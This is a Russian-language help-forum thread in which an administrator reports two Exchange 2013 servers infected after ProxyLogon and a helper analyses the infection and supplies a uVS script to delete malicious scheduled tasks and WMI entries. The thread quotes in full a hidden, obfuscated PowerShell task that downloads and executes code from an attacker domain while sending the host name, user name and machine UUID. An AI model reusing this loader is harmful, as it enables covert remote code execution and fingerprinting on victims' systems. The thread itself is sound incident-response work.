MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. , ProxyLogon

Здравствуйте. MS Exchange 2013 поймали заразу на двух серверах. Прошу проверить. Удалять сам не стал из "шидулера", реестра. Обновления на двух серверах уже установили, закрывающую уязвимость. Если будут еще какие то комментарии напишите пожалуйста.
Положу сюда сразу два образа двух серверов. Если необходимо могу тему скопировать, по одному образу выложу.
Изменено: Владимир Шариков - 18.03.2021 17:16:52
сервер удаленного управления сами ставили?
C:\PROGRAM FILES (X86)\LITEMANAGER PRO - SERVER\ROMSERVER.EXE

есть задачи, через которые возможно пытаются перехватить пароли.
Цитата
C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))

update: возможно, здесь выполняется скачивание зашифрованного скрипта с адреса DOWN.SQLNETCAT.COM, (причем судя по префиксу 20210317 он может обновляться), а далее, powershell.exe его расшифровывает, и выполняет.
Да.  
Вот это не ясно http://t.netcatkit.com/a.jsp?_20210317? :
Скрытый текст
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?
сервер можно будет перегрузить (скриптом)?
Цитата
Владимир Шариков написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?
шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть

сервера похоже, китайские


это зависит от  того, как долго данные задачи работали на серверах. возможно установили бэкдоры, возможно сливали почтуЮ возможно, пытались получить данные из Active Directory, возможно готовились к шифрованию доступных узлов из сети.

стоит конечно тщательно отсканировать клиентские системы и другие сервера, в том числе контроллеры домена.
Экстренные исправления для недавно обнаруженных критических уязвимостей в почтовом сервере Microsoft Exchange появились не сразу, и у организаций было мало времени на подготовку до начала массовой эксплуатации.

Эта ошибка, получившая название ProxyLogon, использовалась в дикой природе еще до того, как Microsoft получила отчет об уязвимости, что дает злоумышленникам двухмесячный старт для взлома целей до появления обновлений безопасности.

Уязвимые серверы являются горячими целями для широкого спектра групп злоумышленников, которые ищут исходную точку опоры в сети для шпионажа или финансовых целей. Злоумышленники, Ransomware и майнинг криптовалют уже использовали ProxyLogon.

С выпущенными исправлениями и появлением кода эксплойта PoC в сети тысячи серверов Microsoft Exchange по всему миру продолжают оставаться уязвимыми, а количество атак по-прежнему вызывает тревогу.

https://www.bleepingcomputer.com/news/security/the-microsoft-exchange-hacks-how-they-started-and-where-we-are/
Цитата
santy написал:
сервер можно будет перегрузить (скриптом)?
Через пол часа можно будет.
Цитата
santy написал:
Цитата
 Владимир  Шариков  написал:
Что этот код делает? Стоит ли боятся "Последствий" этой бяки?
шифрованный код. понятно, что расшифровывается на вашей системе, или наоборот в зашифрованном виде уходит в сеть
Как его возможно расшифровать? Нужно понять что хакер хотел добиться. Как мы поняли хекер воспользовался уявимостью, при обращение к екчанджу происходит срабатывания нескольких скриптов (каких мы не знаем). Но заметили что меняются ДНСы сервера.
Цитата
santy написал:
есть задачи, через которые возможно пытаются перехватить пароли.
Цитата
C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
-W HIDDEN -C I`EX ([SYSTEM.TEXT.ENCODING]::ASCII.GETSTRING((NEW-OBJECT NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT WIN32_COMPUTERSYSTEMPRODUCT).UUID,(RANDOM))-JOIN'*'))))
Вот это слово "Возможно" пугает ))) Тут как я понимаю срабатывает Имя ПК, Индефикатор, и имя пользователя.
выполните в uVS скрипт для очистки задач, без перезагрузки системы: поправил скрипт

Код
 ;uVS v4.11.6 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
;---------command-block---------
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/A.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/A.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
deltsk T.NETCATKIT.COM
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'DOWN.'+'SQLNETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADDATA('HTTP://'+'T.SQL'+'NETCAT.COM/AA.JSP?_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT
delwmi NET.WEBCLIENT).DOWNLOADSTRING('HTTP://'+'T.NET'+'CATKIT.COM/AA.JSP?REP_20210317?'+(@($ENV:COMPUTERNAME,$ENV:USERNAME,(GET-WMIOBJECT

apply

QUIT
Цитата
Владимир Шариков написал:
Положу сюда сразу два образа двух серверов.

можно и второй образ положить
Читают тему (гостей: 1)